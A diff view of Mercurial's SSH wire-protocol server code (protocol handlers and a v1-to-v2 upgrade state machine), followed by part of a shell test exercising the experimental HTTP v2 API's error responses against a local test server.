549 elif isinstance(rsp, wireprototypes.ooberror):
502 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
550 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
503 else:
551 else:
504 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
552 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
505
553
506 def _sshv1respondbytes(fout, value):
554 def _sshv1respondbytes(fout, value):
507 """Send a bytes response for protocol version 1."""
555 """Send a bytes response for protocol version 1."""
508 fout.write('%d\n' % len(value))
556 fout.write('%d\n' % len(value))
509 fout.write(value)
557 fout.write(value)
510 fout.flush()
558 fout.flush()
511
559
512 def _sshv1respondstream(fout, source):
560 def _sshv1respondstream(fout, source):
513 write = fout.write
561 write = fout.write
514 for chunk in source.gen:
562 for chunk in source.gen:
515 write(chunk)
563 write(chunk)
516 fout.flush()
564 fout.flush()
517
565
518 def _sshv1respondooberror(fout, ferr, rsp):
566 def _sshv1respondooberror(fout, ferr, rsp):
519 ferr.write(b'%s\n-\n' % rsp)
567 ferr.write(b'%s\n-\n' % rsp)
520 ferr.flush()
568 ferr.flush()
521 fout.write(b'\n')
569 fout.write(b'\n')
522 fout.flush()
570 fout.flush()
523
571
524 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
572 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
525 """Handler for requests services via version 1 of SSH protocol."""
573 """Handler for requests services via version 1 of SSH protocol."""
526 def __init__(self, ui, fin, fout):
574 def __init__(self, ui, fin, fout):
527 self._ui = ui
575 self._ui = ui
528 self._fin = fin
576 self._fin = fin
529 self._fout = fout
577 self._fout = fout
530
578
531 @property
579 @property
532 def name(self):
580 def name(self):
533 return wireprototypes.SSHV1
581 return wireprototypes.SSHV1
534
582
535 def getargs(self, args):
583 def getargs(self, args):
536 data = {}
584 data = {}
537 keys = args.split()
585 keys = args.split()
538 for n in xrange(len(keys)):
586 for n in xrange(len(keys)):
539 argline = self._fin.readline()[:-1]
587 argline = self._fin.readline()[:-1]
540 arg, l = argline.split()
588 arg, l = argline.split()
541 if arg not in keys:
589 if arg not in keys:
542 raise error.Abort(_("unexpected parameter %r") % arg)
590 raise error.Abort(_("unexpected parameter %r") % arg)
543 if arg == '*':
591 if arg == '*':
544 star = {}
592 star = {}
545 for k in xrange(int(l)):
593 for k in xrange(int(l)):
546 argline = self._fin.readline()[:-1]
594 argline = self._fin.readline()[:-1]
547 arg, l = argline.split()
595 arg, l = argline.split()
548 val = self._fin.read(int(l))
596 val = self._fin.read(int(l))
549 star[arg] = val
597 star[arg] = val
550 data['*'] = star
598 data['*'] = star
551 else:
599 else:
552 val = self._fin.read(int(l))
600 val = self._fin.read(int(l))
553 data[arg] = val
601 data[arg] = val
554 return [data[k] for k in keys]
602 return [data[k] for k in keys]
555
603
556 def forwardpayload(self, fpout):
604 def forwardpayload(self, fpout):
557 # We initially send an empty response. This tells the client it is
605 # We initially send an empty response. This tells the client it is
558 # OK to start sending data. If a client sees any other response, it
606 # OK to start sending data. If a client sees any other response, it
559 # interprets it as an error.
607 # interprets it as an error.
560 _sshv1respondbytes(self._fout, b'')
608 _sshv1respondbytes(self._fout, b'')
561
609
562 # The file is in the form:
610 # The file is in the form:
563 #
611 #
564 # <chunk size>\n<chunk>
612 # <chunk size>\n<chunk>
565 # ...
613 # ...
566 # 0\n
614 # 0\n
567 count = int(self._fin.readline())
615 count = int(self._fin.readline())
568 while count:
616 while count:
569 fpout.write(self._fin.read(count))
617 fpout.write(self._fin.read(count))
570 count = int(self._fin.readline())
618 count = int(self._fin.readline())
571
619
572 @contextlib.contextmanager
620 @contextlib.contextmanager
573 def mayberedirectstdio(self):
621 def mayberedirectstdio(self):
574 yield None
622 yield None
575
623
576 def client(self):
624 def client(self):
577 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
625 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
578 return 'remote:ssh:' + client
626 return 'remote:ssh:' + client
579
627
580 def addcapabilities(self, repo, caps):
628 def addcapabilities(self, repo, caps):
581 return caps
629 return caps
582
630
583 def checkperm(self, perm):
631 def checkperm(self, perm):
584 pass
632 pass
585
633
586 class sshv2protocolhandler(sshv1protocolhandler):
634 class sshv2protocolhandler(sshv1protocolhandler):
587 """Protocol handler for version 2 of the SSH protocol."""
635 """Protocol handler for version 2 of the SSH protocol."""
588
636
589 @property
637 @property
590 def name(self):
638 def name(self):
591 return wireprototypes.SSHV2
639 return wireprototypes.SSHV2
592
640
593 def _runsshserver(ui, repo, fin, fout, ev):
641 def _runsshserver(ui, repo, fin, fout, ev):
594 # This function operates like a state machine of sorts. The following
642 # This function operates like a state machine of sorts. The following
595 # states are defined:
643 # states are defined:
596 #
644 #
597 # protov1-serving
645 # protov1-serving
598 # Server is in protocol version 1 serving mode. Commands arrive on
646 # Server is in protocol version 1 serving mode. Commands arrive on
599 # new lines. These commands are processed in this state, one command
647 # new lines. These commands are processed in this state, one command
600 # after the other.
648 # after the other.
601 #
649 #
602 # protov2-serving
650 # protov2-serving
603 # Server is in protocol version 2 serving mode.
651 # Server is in protocol version 2 serving mode.
604 #
652 #
605 # upgrade-initial
653 # upgrade-initial
606 # The server is going to process an upgrade request.
654 # The server is going to process an upgrade request.
607 #
655 #
608 # upgrade-v2-filter-legacy-handshake
656 # upgrade-v2-filter-legacy-handshake
609 # The protocol is being upgraded to version 2. The server is expecting
657 # The protocol is being upgraded to version 2. The server is expecting
610 # the legacy handshake from version 1.
658 # the legacy handshake from version 1.
611 #
659 #
612 # upgrade-v2-finish
660 # upgrade-v2-finish
613 # The upgrade to version 2 of the protocol is imminent.
661 # The upgrade to version 2 of the protocol is imminent.
614 #
662 #
615 # shutdown
663 # shutdown
616 # The server is shutting down, possibly in reaction to a client event.
664 # The server is shutting down, possibly in reaction to a client event.
617 #
665 #
618 # And here are their transitions:
666 # And here are their transitions:
619 #
667 #
620 # protov1-serving -> shutdown
668 # protov1-serving -> shutdown
621 # When server receives an empty request or encounters another
669 # When server receives an empty request or encounters another
622 # error.
670 # error.
623 #
671 #
624 # protov1-serving -> upgrade-initial
672 # protov1-serving -> upgrade-initial
625 # An upgrade request line was seen.
673 # An upgrade request line was seen.
626 #
674 #
627 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
675 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
628 # Upgrade to version 2 in progress. Server is expecting to
676 # Upgrade to version 2 in progress. Server is expecting to
629 # process a legacy handshake.
677 # process a legacy handshake.
630 #
678 #
631 # upgrade-v2-filter-legacy-handshake -> shutdown
679 # upgrade-v2-filter-legacy-handshake -> shutdown
632 # Client did not fulfill upgrade handshake requirements.
680 # Client did not fulfill upgrade handshake requirements.
633 #
681 #
634 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
682 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
635 # Client fulfilled version 2 upgrade requirements. Finishing that
683 # Client fulfilled version 2 upgrade requirements. Finishing that
636 # upgrade.
684 # upgrade.
637 #
685 #
638 # upgrade-v2-finish -> protov2-serving
686 # upgrade-v2-finish -> protov2-serving
639 # Protocol upgrade to version 2 complete. Server can now speak protocol
687 # Protocol upgrade to version 2 complete. Server can now speak protocol
640 # version 2.
688 # version 2.
641 #
689 #
642 # protov2-serving -> protov1-serving
690 # protov2-serving -> protov1-serving
643 # Ths happens by default since protocol version 2 is the same as
691 # Ths happens by default since protocol version 2 is the same as
644 # version 1 except for the handshake.
692 # version 1 except for the handshake.
645
693
646 state = 'protov1-serving'
694 state = 'protov1-serving'
647 proto = sshv1protocolhandler(ui, fin, fout)
695 proto = sshv1protocolhandler(ui, fin, fout)
648 protoswitched = False
696 protoswitched = False
649
697
650 while not ev.is_set():
698 while not ev.is_set():
651 if state == 'protov1-serving':
699 if state == 'protov1-serving':
652 # Commands are issued on new lines.
700 # Commands are issued on new lines.
653 request = fin.readline()[:-1]
701 request = fin.readline()[:-1]
654
702
655 # Empty lines signal to terminate the connection.
703 # Empty lines signal to terminate the connection.
656 if not request:
704 if not request:
657 state = 'shutdown'
705 state = 'shutdown'
658 continue
706 continue
659
707
660 # It looks like a protocol upgrade request. Transition state to
708 # It looks like a protocol upgrade request. Transition state to
661 # handle it.
709 # handle it.
662 if request.startswith(b'upgrade '):
710 if request.startswith(b'upgrade '):
663 if protoswitched:
711 if protoswitched:
664 _sshv1respondooberror(fout, ui.ferr,
712 _sshv1respondooberror(fout, ui.ferr,
665 b'cannot upgrade protocols multiple '
713 b'cannot upgrade protocols multiple '
666 b'times')
714 b'times')
667 state = 'shutdown'
715 state = 'shutdown'
668 continue
716 continue
669
717
670 state = 'upgrade-initial'
718 state = 'upgrade-initial'
671 continue
719 continue
672
720
673 available = wireproto.commands.commandavailable(request, proto)
721 available = wireproto.commands.commandavailable(request, proto)
674
722
675 # This command isn't available. Send an empty response and go
723 # This command isn't available. Send an empty response and go
676 # back to waiting for a new command.
724 # back to waiting for a new command.
677 if not available:
725 if not available:
678 _sshv1respondbytes(fout, b'')
726 _sshv1respondbytes(fout, b'')
679 continue
727 continue
680
728
681 rsp = wireproto.dispatch(repo, proto, request)
729 rsp = wireproto.dispatch(repo, proto, request)
682
730
683 if isinstance(rsp, bytes):
731 if isinstance(rsp, bytes):
684 _sshv1respondbytes(fout, rsp)
732 _sshv1respondbytes(fout, rsp)
685 elif isinstance(rsp, wireprototypes.bytesresponse):
733 elif isinstance(rsp, wireprototypes.bytesresponse):
686 _sshv1respondbytes(fout, rsp.data)
734 _sshv1respondbytes(fout, rsp.data)
687 elif isinstance(rsp, wireprototypes.streamres):
735 elif isinstance(rsp, wireprototypes.streamres):
688 _sshv1respondstream(fout, rsp)
736 _sshv1respondstream(fout, rsp)
689 elif isinstance(rsp, wireprototypes.streamreslegacy):
737 elif isinstance(rsp, wireprototypes.streamreslegacy):
690 _sshv1respondstream(fout, rsp)
738 _sshv1respondstream(fout, rsp)
691 elif isinstance(rsp, wireprototypes.pushres):
739 elif isinstance(rsp, wireprototypes.pushres):
692 _sshv1respondbytes(fout, b'')
740 _sshv1respondbytes(fout, b'')
693 _sshv1respondbytes(fout, b'%d' % rsp.res)
741 _sshv1respondbytes(fout, b'%d' % rsp.res)
694 elif isinstance(rsp, wireprototypes.pusherr):
742 elif isinstance(rsp, wireprototypes.pusherr):
695 _sshv1respondbytes(fout, rsp.res)
743 _sshv1respondbytes(fout, rsp.res)
696 elif isinstance(rsp, wireprototypes.ooberror):
744 elif isinstance(rsp, wireprototypes.ooberror):
697 _sshv1respondooberror(fout, ui.ferr, rsp.message)
745 _sshv1respondooberror(fout, ui.ferr, rsp.message)
698 else:
746 else:
699 raise error.ProgrammingError('unhandled response type from '
747 raise error.ProgrammingError('unhandled response type from '
700 'wire protocol command: %s' % rsp)
748 'wire protocol command: %s' % rsp)
701
749
702 # For now, protocol version 2 serving just goes back to version 1.
750 # For now, protocol version 2 serving just goes back to version 1.
703 elif state == 'protov2-serving':
751 elif state == 'protov2-serving':
704 state = 'protov1-serving'
752 state = 'protov1-serving'
705 continue
753 continue
706
754
707 elif state == 'upgrade-initial':
755 elif state == 'upgrade-initial':
708 # We should never transition into this state if we've switched
756 # We should never transition into this state if we've switched
709 # protocols.
757 # protocols.
710 assert not protoswitched
758 assert not protoswitched
711 assert proto.name == wireprototypes.SSHV1
759 assert proto.name == wireprototypes.SSHV1
712
760
713 # Expected: upgrade <token> <capabilities>
761 # Expected: upgrade <token> <capabilities>
714 # If we get something else, the request is malformed. It could be
762 # If we get something else, the request is malformed. It could be
715 # from a future client that has altered the upgrade line content.
763 # from a future client that has altered the upgrade line content.
716 # We treat this as an unknown command.
764 # We treat this as an unknown command.
717 try:
765 try:
718 token, caps = request.split(b' ')[1:]
766 token, caps = request.split(b' ')[1:]
719 except ValueError:
767 except ValueError:
720 _sshv1respondbytes(fout, b'')
768 _sshv1respondbytes(fout, b'')
721 state = 'protov1-serving'
769 state = 'protov1-serving'
722 continue
770 continue
723
771
724 # Send empty response if we don't support upgrading protocols.
772 # Send empty response if we don't support upgrading protocols.
725 if not ui.configbool('experimental', 'sshserver.support-v2'):
773 if not ui.configbool('experimental', 'sshserver.support-v2'):
726 _sshv1respondbytes(fout, b'')
774 _sshv1respondbytes(fout, b'')
727 state = 'protov1-serving'
775 state = 'protov1-serving'
728 continue
776 continue
729
777
730 try:
778 try:
731 caps = urlreq.parseqs(caps)
779 caps = urlreq.parseqs(caps)
732 except ValueError:
780 except ValueError:
733 _sshv1respondbytes(fout, b'')
781 _sshv1respondbytes(fout, b'')
734 state = 'protov1-serving'
782 state = 'protov1-serving'
735 continue
783 continue
736
784
737 # We don't see an upgrade request to protocol version 2. Ignore
785 # We don't see an upgrade request to protocol version 2. Ignore
738 # the upgrade request.
786 # the upgrade request.
739 wantedprotos = caps.get(b'proto', [b''])[0]
787 wantedprotos = caps.get(b'proto', [b''])[0]
740 if SSHV2 not in wantedprotos:
788 if SSHV2 not in wantedprotos:
741 _sshv1respondbytes(fout, b'')
789 _sshv1respondbytes(fout, b'')
742 state = 'protov1-serving'
790 state = 'protov1-serving'
743 continue
791 continue
744
792
745 # It looks like we can honor this upgrade request to protocol 2.
793 # It looks like we can honor this upgrade request to protocol 2.
746 # Filter the rest of the handshake protocol request lines.
794 # Filter the rest of the handshake protocol request lines.
747 state = 'upgrade-v2-filter-legacy-handshake'
795 state = 'upgrade-v2-filter-legacy-handshake'
748 continue
796 continue
749
797
750 elif state == 'upgrade-v2-filter-legacy-handshake':
798 elif state == 'upgrade-v2-filter-legacy-handshake':
751 # Client should have sent legacy handshake after an ``upgrade``
799 # Client should have sent legacy handshake after an ``upgrade``
752 # request. Expected lines:
800 # request. Expected lines:
753 #
801 #
754 # hello
802 # hello
755 # between
803 # between
756 # pairs 81
804 # pairs 81
757 # 0000...-0000...
805 # 0000...-0000...
758
806
759 ok = True
807 ok = True
760 for line in (b'hello', b'between', b'pairs 81'):
808 for line in (b'hello', b'between', b'pairs 81'):
761 request = fin.readline()[:-1]
809 request = fin.readline()[:-1]
762
810
763 if request != line:
811 if request != line:
764 _sshv1respondooberror(fout, ui.ferr,
812 _sshv1respondooberror(fout, ui.ferr,
765 b'malformed handshake protocol: '
813 b'malformed handshake protocol: '
766 b'missing %s' % line)
814 b'missing %s' % line)
767 ok = False
815 ok = False
768 state = 'shutdown'
816 state = 'shutdown'
769 break
817 break
770
818
771 if not ok:
819 if not ok:
772 continue
820 continue
773
821
774 request = fin.read(81)
822 request = fin.read(81)
775 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
823 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
776 _sshv1respondooberror(fout, ui.ferr,
824 _sshv1respondooberror(fout, ui.ferr,
777 b'malformed handshake protocol: '
825 b'malformed handshake protocol: '
778 b'missing between argument value')
826 b'missing between argument value')
779 state = 'shutdown'
827 state = 'shutdown'
780 continue
828 continue
781
829
782 state = 'upgrade-v2-finish'
830 state = 'upgrade-v2-finish'
783 continue
831 continue
784
832
785 elif state == 'upgrade-v2-finish':
833 elif state == 'upgrade-v2-finish':
786 # Send the upgrade response.
834 # Send the upgrade response.
787 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
835 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
788 servercaps = wireproto.capabilities(repo, proto)
836 servercaps = wireproto.capabilities(repo, proto)
789 rsp = b'capabilities: %s' % servercaps.data
837 rsp = b'capabilities: %s' % servercaps.data
790 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
838 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
791 fout.flush()
839 fout.flush()
792
840
793 proto = sshv2protocolhandler(ui, fin, fout)
841 proto = sshv2protocolhandler(ui, fin, fout)
794 protoswitched = True
842 protoswitched = True
795
843
796 state = 'protov2-serving'
844 state = 'protov2-serving'
797 continue
845 continue
798
846
799 elif state == 'shutdown':
847 elif state == 'shutdown':
800 break
848 break
801
849
802 else:
850 else:
803 raise error.ProgrammingError('unhandled ssh server state: %s' %
851 raise error.ProgrammingError('unhandled ssh server state: %s' %
804 state)
852 state)
805
853
806 class sshserver(object):
854 class sshserver(object):
807 def __init__(self, ui, repo, logfh=None):
855 def __init__(self, ui, repo, logfh=None):
808 self._ui = ui
856 self._ui = ui
809 self._repo = repo
857 self._repo = repo
810 self._fin = ui.fin
858 self._fin = ui.fin
811 self._fout = ui.fout
859 self._fout = ui.fout
812
860
813 # Log write I/O to stdout and stderr if configured.
861 # Log write I/O to stdout and stderr if configured.
814 if logfh:
862 if logfh:
815 self._fout = util.makeloggingfileobject(
863 self._fout = util.makeloggingfileobject(
816 logfh, self._fout, 'o', logdata=True)
864 logfh, self._fout, 'o', logdata=True)
817 ui.ferr = util.makeloggingfileobject(
865 ui.ferr = util.makeloggingfileobject(
818 logfh, ui.ferr, 'e', logdata=True)
866 logfh, ui.ferr, 'e', logdata=True)
819
867
820 hook.redirect(True)
868 hook.redirect(True)
821 ui.fout = repo.ui.fout = ui.ferr
869 ui.fout = repo.ui.fout = ui.ferr
822
870
823 # Prevent insertion/deletion of CRs
871 # Prevent insertion/deletion of CRs
824 util.setbinary(self._fin)
872 util.setbinary(self._fin)
825 util.setbinary(self._fout)
873 util.setbinary(self._fout)
826
874
827 def serve_forever(self):
875 def serve_forever(self):
828 self.serveuntil(threading.Event())
876 self.serveuntil(threading.Event())
829 sys.exit(0)
877 sys.exit(0)
830
878
831 def serveuntil(self, ev):
879 def serveuntil(self, ev):
832 """Serve until a threading.Event is set."""
880 """Serve until a threading.Event is set."""
833 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
881 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
@@ -1,331 +1,406 b''
1 $ HTTPV2=exp-http-v2-0001
1 $ HTTPV2=exp-http-v2-0001
2 $ MEDIATYPE=application/mercurial-exp-framing-0001
2 $ MEDIATYPE=application/mercurial-exp-framing-0001
3
3
4 $ send() {
4 $ send() {
5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
6 > }
6 > }
7
7
8 $ cat > dummycommands.py << EOF
8 $ cat > dummycommands.py << EOF
9 > from mercurial import wireprototypes, wireproto
9 > from mercurial import wireprototypes, wireproto
10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
11 > def customreadonly(repo, proto):
11 > def customreadonly(repo, proto):
12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
14 > def customreadwrite(repo, proto):
14 > def customreadwrite(repo, proto):
15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
16 > EOF
16 > EOF
17
17
18 $ cat >> $HGRCPATH << EOF
18 $ cat >> $HGRCPATH << EOF
19 > [extensions]
19 > [extensions]
20 > dummycommands = $TESTTMP/dummycommands.py
20 > dummycommands = $TESTTMP/dummycommands.py
21 > EOF
21 > EOF
22
22
23 $ hg init server
23 $ hg init server
24 $ cat > server/.hg/hgrc << EOF
24 $ cat > server/.hg/hgrc << EOF
25 > [experimental]
25 > [experimental]
26 > web.apiserver = true
26 > web.apiserver = true
27 > EOF
27 > EOF
28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
29 $ cat hg.pid > $DAEMON_PIDS
29 $ cat hg.pid > $DAEMON_PIDS
30
30
31 HTTP v2 protocol not enabled by default
31 HTTP v2 protocol not enabled by default
32
32
33 $ send << EOF
33 $ send << EOF
34 > httprequest GET api/$HTTPV2
34 > httprequest GET api/$HTTPV2
35 > user-agent: test
35 > user-agent: test
36 > EOF
36 > EOF
37 using raw connection to peer
37 using raw connection to peer
38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
39 s> Accept-Encoding: identity\r\n
39 s> Accept-Encoding: identity\r\n
40 s> user-agent: test\r\n
40 s> user-agent: test\r\n
41 s> host: $LOCALIP:$HGPORT\r\n (glob)
41 s> host: $LOCALIP:$HGPORT\r\n (glob)
42 s> \r\n
42 s> \r\n
43 s> makefile('rb', None)
43 s> makefile('rb', None)
44 s> HTTP/1.1 404 Not Found\r\n
44 s> HTTP/1.1 404 Not Found\r\n
45 s> Server: testing stub value\r\n
45 s> Server: testing stub value\r\n
46 s> Date: $HTTP_DATE$\r\n
46 s> Date: $HTTP_DATE$\r\n
47 s> Content-Type: text/plain\r\n
47 s> Content-Type: text/plain\r\n
48 s> Content-Length: 33\r\n
48 s> Content-Length: 33\r\n
49 s> \r\n
49 s> \r\n
50 s> API exp-http-v2-0001 not enabled\n
50 s> API exp-http-v2-0001 not enabled\n
51
51
52 Restart server with support for HTTP v2 API
52 Restart server with support for HTTP v2 API
53
53
54 $ killdaemons.py
54 $ killdaemons.py
55 $ cat > server/.hg/hgrc << EOF
55 $ cat > server/.hg/hgrc << EOF
56 > [experimental]
56 > [experimental]
57 > web.apiserver = true
57 > web.apiserver = true
58 > web.api.http-v2 = true
58 > web.api.http-v2 = true
59 > EOF
59 > EOF
60
60
61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
62 $ cat hg.pid > $DAEMON_PIDS
62 $ cat hg.pid > $DAEMON_PIDS
63
63
64 Request to unknown command yields 404
64 Request to unknown command yields 404
65
65
66 $ send << EOF
66 $ send << EOF
67 > httprequest POST api/$HTTPV2/ro/badcommand
67 > httprequest POST api/$HTTPV2/ro/badcommand
68 > user-agent: test
68 > user-agent: test
69 > EOF
69 > EOF
70 using raw connection to peer
70 using raw connection to peer
71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
72 s> Accept-Encoding: identity\r\n
72 s> Accept-Encoding: identity\r\n
73 s> user-agent: test\r\n
73 s> user-agent: test\r\n
74 s> host: $LOCALIP:$HGPORT\r\n (glob)
74 s> host: $LOCALIP:$HGPORT\r\n (glob)
75 s> \r\n
75 s> \r\n
76 s> makefile('rb', None)
76 s> makefile('rb', None)
77 s> HTTP/1.1 404 Not Found\r\n
77 s> HTTP/1.1 404 Not Found\r\n
78 s> Server: testing stub value\r\n
78 s> Server: testing stub value\r\n
79 s> Date: $HTTP_DATE$\r\n
79 s> Date: $HTTP_DATE$\r\n
80 s> Content-Type: text/plain\r\n
80 s> Content-Type: text/plain\r\n
81 s> Content-Length: 42\r\n
81 s> Content-Length: 42\r\n
82 s> \r\n
82 s> \r\n
83 s> unknown wire protocol command: badcommand\n
83 s> unknown wire protocol command: badcommand\n
84
84
85 GET to read-only command yields a 405
85 GET to read-only command yields a 405
86
86
87 $ send << EOF
87 $ send << EOF
88 > httprequest GET api/$HTTPV2/ro/customreadonly
88 > httprequest GET api/$HTTPV2/ro/customreadonly
89 > user-agent: test
89 > user-agent: test
90 > EOF
90 > EOF
91 using raw connection to peer
91 using raw connection to peer
92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
93 s> Accept-Encoding: identity\r\n
93 s> Accept-Encoding: identity\r\n
94 s> user-agent: test\r\n
94 s> user-agent: test\r\n
95 s> host: $LOCALIP:$HGPORT\r\n (glob)
95 s> host: $LOCALIP:$HGPORT\r\n (glob)
96 s> \r\n
96 s> \r\n
97 s> makefile('rb', None)
97 s> makefile('rb', None)
98 s> HTTP/1.1 405 Method Not Allowed\r\n
98 s> HTTP/1.1 405 Method Not Allowed\r\n
99 s> Server: testing stub value\r\n
99 s> Server: testing stub value\r\n
100 s> Date: $HTTP_DATE$\r\n
100 s> Date: $HTTP_DATE$\r\n
101 s> Allow: POST\r\n
101 s> Allow: POST\r\n
102 s> Content-Length: 30\r\n
102 s> Content-Length: 30\r\n
103 s> \r\n
103 s> \r\n
104 s> commands require POST requests
104 s> commands require POST requests
105
105
106 Missing Accept header results in 406
106 Missing Accept header results in 406
107
107
108 $ send << EOF
108 $ send << EOF
109 > httprequest POST api/$HTTPV2/ro/customreadonly
109 > httprequest POST api/$HTTPV2/ro/customreadonly
110 > user-agent: test
110 > user-agent: test
111 > EOF
111 > EOF
112 using raw connection to peer
112 using raw connection to peer
113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
114 s> Accept-Encoding: identity\r\n
114 s> Accept-Encoding: identity\r\n
115 s> user-agent: test\r\n
115 s> user-agent: test\r\n
116 s> host: $LOCALIP:$HGPORT\r\n (glob)
116 s> host: $LOCALIP:$HGPORT\r\n (glob)
117 s> \r\n
117 s> \r\n
118 s> makefile('rb', None)
118 s> makefile('rb', None)
119 s> HTTP/1.1 406 Not Acceptable\r\n
119 s> HTTP/1.1 406 Not Acceptable\r\n
120 s> Server: testing stub value\r\n
120 s> Server: testing stub value\r\n
121 s> Date: $HTTP_DATE$\r\n
121 s> Date: $HTTP_DATE$\r\n
122 s> Content-Type: text/plain\r\n
122 s> Content-Type: text/plain\r\n
123 s> Content-Length: 85\r\n
123 s> Content-Length: 85\r\n
124 s> \r\n
124 s> \r\n
125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
126
126
127 Bad Accept header results in 406
127 Bad Accept header results in 406
128
128
129 $ send << EOF
129 $ send << EOF
130 > httprequest POST api/$HTTPV2/ro/customreadonly
130 > httprequest POST api/$HTTPV2/ro/customreadonly
131 > accept: invalid
131 > accept: invalid
132 > user-agent: test
132 > user-agent: test
133 > EOF
133 > EOF
134 using raw connection to peer
134 using raw connection to peer
135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
136 s> Accept-Encoding: identity\r\n
136 s> Accept-Encoding: identity\r\n
137 s> accept: invalid\r\n
137 s> accept: invalid\r\n
138 s> user-agent: test\r\n
138 s> user-agent: test\r\n
139 s> host: $LOCALIP:$HGPORT\r\n (glob)
139 s> host: $LOCALIP:$HGPORT\r\n (glob)
140 s> \r\n
140 s> \r\n
141 s> makefile('rb', None)
141 s> makefile('rb', None)
142 s> HTTP/1.1 406 Not Acceptable\r\n
142 s> HTTP/1.1 406 Not Acceptable\r\n
143 s> Server: testing stub value\r\n
143 s> Server: testing stub value\r\n
144 s> Date: $HTTP_DATE$\r\n
144 s> Date: $HTTP_DATE$\r\n
145 s> Content-Type: text/plain\r\n
145 s> Content-Type: text/plain\r\n
146 s> Content-Length: 85\r\n
146 s> Content-Length: 85\r\n
147 s> \r\n
147 s> \r\n
148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
149
149
150 Bad Content-Type header results in 415
150 Bad Content-Type header results in 415
151
151
152 $ send << EOF
152 $ send << EOF
153 > httprequest POST api/$HTTPV2/ro/customreadonly
153 > httprequest POST api/$HTTPV2/ro/customreadonly
154 > accept: $MEDIATYPE
154 > accept: $MEDIATYPE
155 > user-agent: test
155 > user-agent: test
156 > content-type: badmedia
156 > content-type: badmedia
157 > EOF
157 > EOF
158 using raw connection to peer
158 using raw connection to peer
159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
160 s> Accept-Encoding: identity\r\n
160 s> Accept-Encoding: identity\r\n
161 s> accept: application/mercurial-exp-framing-0001\r\n
161 s> accept: application/mercurial-exp-framing-0001\r\n
162 s> content-type: badmedia\r\n
162 s> content-type: badmedia\r\n
163 s> user-agent: test\r\n
163 s> user-agent: test\r\n
164 s> host: $LOCALIP:$HGPORT\r\n (glob)
164 s> host: $LOCALIP:$HGPORT\r\n (glob)
165 s> \r\n
165 s> \r\n
166 s> makefile('rb', None)
166 s> makefile('rb', None)
167 s> HTTP/1.1 415 Unsupported Media Type\r\n
167 s> HTTP/1.1 415 Unsupported Media Type\r\n
168 s> Server: testing stub value\r\n
168 s> Server: testing stub value\r\n
169 s> Date: $HTTP_DATE$\r\n
169 s> Date: $HTTP_DATE$\r\n
170 s> Content-Type: text/plain\r\n
170 s> Content-Type: text/plain\r\n
171 s> Content-Length: 88\r\n
171 s> Content-Length: 88\r\n
172 s> \r\n
172 s> \r\n
173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
174
174
175 Request to read-only command works out of the box
175 Request to read-only command works out of the box
176
176
177 $ send << EOF
177 $ send << EOF
178 > httprequest POST api/$HTTPV2/ro/customreadonly
178 > httprequest POST api/$HTTPV2/ro/customreadonly
179 > accept: $MEDIATYPE
179 > accept: $MEDIATYPE
180 > content-type: $MEDIATYPE
180 > content-type: $MEDIATYPE
181 > user-agent: test
181 > user-agent: test
182 > frame command-name eos customreadonly
182 > frame command-name eos customreadonly
183 > EOF
183 > EOF
184 using raw connection to peer
184 using raw connection to peer
185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
186 s> Accept-Encoding: identity\r\n
186 s> Accept-Encoding: identity\r\n
